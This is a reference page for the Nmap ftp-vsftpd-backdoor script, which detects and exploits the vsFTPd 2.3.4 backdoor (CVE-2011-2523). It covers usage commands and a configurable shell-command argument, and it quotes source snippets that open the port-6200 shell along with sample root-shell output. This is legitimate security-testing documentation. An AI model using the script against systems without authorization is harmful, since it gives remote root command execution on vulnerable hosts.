Nmap ftp-vsftpd-backdoor NSE Script
This page contains detailed information about how to use the ftp-vsftpd-backdoor NSE script. For list of all NSE scripts, visit the Nmap NSE Library.
| Select: |
|---|
Script Overview
Script source code: https://github.com/nmap/nmap/tree/master/scripts/ftp-vsftpd-backdoor.nse
Script categories: exploit, intrusive, malware, vuln
Target service / protocol: ftp
Target network port(s): 21
List of CVEs: CVE-2011-2523
Script Description
The ftp-vsftpd-backdoor.nse script tests for the presence of the vsFTPd 2.3.4 backdoor reported on 2011-07-04
(CVE-2011-2523). This script attempts to exploit the backdoor using the
innocuous id command by default, but that can be changed with
the exploit.cmd or ftp-vsftpd-backdoor.cmd script
arguments.
References:
- http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
- http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=CVE-2011-2523
Ftp-vsftpd-backdoor NSE Script Arguments
This is a full list of arguments supported by the ftp-vsftpd-backdoor.nse script:
ftp-vsftpd-backdoor.cmd
Command to execute in shell (default is id).
If set, vulnerabilities will be output in short format, a single line consisting of the host's target name or IP, the state, and either the CVE ID or the title of the vulnerability. Does not affect XML output.
vulns.showall
If set, the library will show and report all the registered vulnerabilities which includes the NOT VULNERABLE ones. By default the library will only report the VULNERABLE entries: VULNERABLE, LIKELY VULNERABLE, VULNERABLE (DoS) and VULNERABLE (Exploitable). This argument affects the following functions: vulns.Report.make_output(): the default output function for portule/hostrule scripts. vulns.make_output(): the default output function for postrule scripts. vulns.format_vuln() and vulns.format_vuln_table() functions.
- - -
To use these script arguments, add them to the Nmap command line using the --script-args arg1=value,[arg2=value,..] syntax. For example:
nmap --script=ftp-vsftpd-backdoor --script-args ftp-vsftpd-backdoor.cmd=value,vulns.short=value <target>Ftp-vsftpd-backdoor NSE Script Example Usage
Here's an example of how to use the ftp-vsftpd-backdoor.nse script:
nmap --script ftp-vsftpd-backdoor -p 21 <host>
Ftp-vsftpd-backdoor NSE Script Example Output
Here's a sample output from the ftp-vsftpd-backdoor.nse script:
PORT STATE SERVICE
21/tcp open ftp
| ftp-vsftpd-backdoor:
| VULNERABLE:
| vsFTPd version 2.3.4 backdoor
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2011-2523 BID:48539
| Description:
| vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
| Disclosure date: 2011-07-03
| Exploit results:
| The backdoor was already triggered
| Shell command: id
| Results: uid=0(root) gid=0(root) groups=0(root)
| References:
| https://www.securityfocus.com/bid/48539
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
| http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
|_ https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
Ftp-vsftpd-backdoor NSE Script Example XML Output
There is no sample XML output for this module. However, by providing the -oX <file> option, Nmap will produce a XML output and save it in the file.xml file.
Author
- Daniel Miller
References
- https://nmap.org/nsedoc/scripts/ftp-vsftpd-backdoor.html
- https://github.com/nmap/nmap/tree/master/scripts/ftp-vsftpd-backdoor.nse
- http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
- http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=CVE-2011-2523
- https://www.securityfocus.com/bid/48539
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
See Also
Related NSE scripts to the ftp-vsftpd-backdoor.nse script:
- ftp-anon.nse
- ftp-bounce.nse
- ftp-brute.nse
- ftp-libopie.nse
- ftp-proftpd-backdoor.nse
- ftp-syst.nse
- ftp-vuln-cve2010-4221.nse
Visit Nmap NSE Library for more scripts.
The ftp-vsftpd-backdoor.nse script may fail with the following error messages. Check for the possible causes by using the code snippets highlighted below found in the script source code. This can often times help in identifying the root cause of the problem.
can't connect to tcp port 6200
Here is a relevant code snippet related to the "can't connect to tcp port 6200" error message:
83: local socket = nmap.new_socket("tcp")
84: socket:set_timeout(10000)
85:
86: local status, ret = socket:connect(host, 6200, "tcp")
87: if not status then
88: return finish_ftp(socket, false, "can't connect to tcp port 6200")
89: end
90:
91: status, ret = socket:send(CMD_SHELL_ID.."\n")
92: if not status then
93: return finish_ftp(socket, false, "failed to send shell command")
failed to send shell command
Here is a relevant code snippet related to the "failed to send shell command" error message:
88: return finish_ftp(socket, false, "can't connect to tcp port 6200")
89: end
90:
91: status, ret = socket:send(CMD_SHELL_ID.."\n")
92: if not status then
93: return finish_ftp(socket, false, "failed to send shell command")
94: end
95:
96: status, ret = socket:receive_lines(1)
97: if not status then
98: return finish_ftp(socket, false,
failed to read shell command results: %s
Here is a relevant code snippet related to the "failed to read shell command results: %s" error message:
94: end
95:
96: status, ret = socket:receive_lines(1)
97: if not status then
98: return finish_ftp(socket, false,
99: string.format("failed to read shell command results: %s",
100: ret))
101: end
102:
103: if not ret:match("uid=") then
104: return finish_ftp(socket, false, "service on port 6200 is not the vsFTPd backdoor: NOT VULNERABLE")
service on port 6200 is not the vsFTPd backdoor: NOT VULNERABLE
Here is a relevant code snippet related to the "service on port 6200 is not the vsFTPd backdoor: NOT VULNERABLE" error message:
99: string.format("failed to read shell command results: %s",
100: ret))
101: end
102:
103: if not ret:match("uid=") then
104: return finish_ftp(socket, false, "service on port 6200 is not the vsFTPd backdoor: NOT VULNERABLE")
105: end
106:
107: vuln.state = vulns.STATE.EXPLOIT
108: table.insert(vuln.exploit_results,
109: string.format("Shell command: %s", CMD_SHELL_ID))
failed to send privilege escalation command: %s
Here is a relevant code snippet related to the "failed to send privilege escalation command: %s" error message:
172: return nil
173: end
174:
175: status, ret = sock:send(CMD_FTP .. "\r\n")
176: if not status then
177: stdnse.debug1("failed to send privilege escalation command: %s", ret)
178: return nil
179: end
180:
181: stdnse.sleep(1)
182: -- check if vsFTPd was backdoored
Version
This page has been created based on Nmap version 7.92.
Go back to menu.
